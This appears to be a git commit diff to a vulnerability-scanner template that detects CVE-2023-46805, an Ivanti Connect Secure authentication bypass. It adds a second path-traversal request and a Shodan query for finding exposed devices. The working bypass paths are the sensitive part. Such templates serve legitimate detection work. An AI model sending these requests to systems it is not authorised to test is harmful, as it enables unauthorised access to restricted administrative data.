feat: added more path to detect CVE-2023-46805

2024-02-01 08:32:28 +07:00 · 2024-02-01 08:32:28 +07:00 · a7d487708a
parent d100d82527
commit a7d487708a
1 changed files with 26 additions and 23 deletions
--- a/http/cves/2023/CVE-2023-46805.yaml
+++ b/http/cves/2023/CVE-2023-46805.yaml
@ -2,7 +2,7 @@ id: CVE-2023-46805

 info:
  name: Ivanti ICS - Authentication Bypass
-  author: DhiyaneshDK
+  author: DhiyaneshDK,daffainfo,geeknik
  severity: high
  description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
  reference:
@ -15,33 +15,36 @@ info:
    cwe-id: CWE-287
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
-    max-request: 1
    vendor: ivanti
-    product: "connect_secure"
-    shodan-query: "html:\"welcome.cgi?p=logo\""
+    product: connect_secure
+    shodan-query: html:"welcome.cgi?p=logo"
  tags: cve,cve2023,kev,auth-bypass,ivanti

 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/totp/user-backup-code/../../system/system-information"
+  - raw:
+      - |
+        GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
+        Host: {{Hostname}}

-    matchers-condition: and
+      - |
+        GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: or
    matchers:
-      - type: word
-        part: body
-        words:
-          - '"build":'
-          - '"system-information":'
-          - '"software-inventory":'
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "build")'
+          - 'contains(body_1, "system-information")'
+          - 'contains(body_1, "software-inventory")'
+          - 'contains(all_headers_1, "application/json")'
        condition: and

-      - type: word
-        part: header
-        words:
-          - 'application/json'
-
-      - type: status
-        status:
-          - 200
-# digest: 490a0046304402200c2940ac9185c5eb2e95f351128a93769e4ec4fe672f158c99b3b4dc4b84b3a1022029f5e9c610b5d8b080a94548f97227972aee323b91cec07e4d3795f37cdb64ac:922c64590222798bb761d5b6d8e72950
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "poll_interval")'
+          - 'contains(body_2, "block_message")'
+          - 'contains(all_headers_2, "application/json")'
+        condition: and